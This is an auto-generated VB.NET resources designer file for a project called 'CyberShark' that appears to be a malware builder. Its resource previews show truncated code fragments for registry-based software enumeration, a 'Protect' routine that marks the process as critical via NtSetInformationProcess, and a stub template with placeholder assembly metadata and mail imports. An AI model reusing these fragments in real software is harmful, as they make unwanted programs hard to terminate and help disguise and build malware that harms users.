'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:4.0.30319.1
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'This class was auto-generated by the StronglyTypedResourceBuilder
    'class via a tool like ResGen or Visual Studio.
    'To add or remove a member, edit your .ResX file then rerun ResGen
    'with the /str option, or rebuild your VS project.
    '''<summary>
    '''  A strongly-typed resource class, for looking up localized strings, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Returns the cached ResourceManager instance used by this class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("CyberShark.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Overrides the current thread's CurrentUICulture property for all
        '''  resource lookups using this strongly typed resource class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Public Function GetSoftware() As String
        '''        Dim Software As String = Nothing
        '''        Dim SoftwareKey As String = &quot;SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall&quot;
        '''        Using rk As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.LocalMachine.OpenSubKey(SoftwareKey)
        '''            For Each skName As String In rk.GetSubKeyNames()
        '''                Using sk As Microsoft.Win32.RegistryKey = rk.OpenSubKey(skName)
        '''                    Try
        '''                        If Not (sk.GetValue(&quot;DisplayName&quot; [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property Junk() As String
            Get
                Return ResourceManager.GetString("Junk", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to 
        '''
        '''   Public Class cProtect
        '''        Public Sub ProtectProcess(bProtect As Boolean)
        '''            Dim hProc As IntPtr = GetCurrentProcess()
        '''            Dim bResult As Boolean = GetPrivilegs(SE_DEBUG_NAME)
        '''            Dim ProcessInfo As IntPtr = IntPtr.Zero
        '''
        '''            If bProtect = True Then
        '''                ProcessInfo = New IntPtr(29)
        '''            End If
        '''
        '''            NtSetInformationProcess(hProc, iBreakTermination, New IntPtr(VarPtr(ProcessInfo)), Marshal.SizeOf(ProcessInfo))
        '''        End Sub
        '''
        '''  [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property Protect() As String
            Get
                Return ResourceManager.GetString("Protect", resourceCulture)
            End Get
        End Property
        
        Friend ReadOnly Property r_5() As System.Drawing.Icon
            Get
                Dim obj As Object = ResourceManager.GetObject("r_5", resourceCulture)
                Return CType(obj,System.Drawing.Icon)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Imports Microsoft.VisualBasic
        '''Imports System.Reflection
        '''Imports System.Net.Mail
        '''Imports System.Net
        '''Imports System.Text
        '''Imports System
        '''Imports System.Windows.Forms
        '''^IMPORT^
        '''
        '''&lt;Assembly: AssemblyTitle(&quot;^1^&quot;)&gt; 
        '''&lt;Assembly: AssemblyDescription(&quot;^2^&quot;)&gt; 
        '''&lt;Assembly: AssemblyCompany(&quot;^3^&quot;)&gt; 
        '''&lt;Assembly: AssemblyProduct(&quot;^4^&quot;)&gt; 
        '''&lt;Assembly: AssemblyCopyright(&quot;^5^&quot;)&gt; 
        '''&lt;Assembly: AssemblyTrademark(&quot;^6^&quot;)&gt; 
        '''&lt;Assembly: AssemblyVersion(&quot;^%1^.^%2^.^%3^.^%4^&quot;)&gt; 
        '''&lt;Assembly: AssemblyFileVersion(&quot;^%1^.^%2^.^%3^.^% [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property Source() As String
            Get
                Return ResourceManager.GetString("Source", resourceCulture)
            End Get
        End Property
    End Module
End Namespace
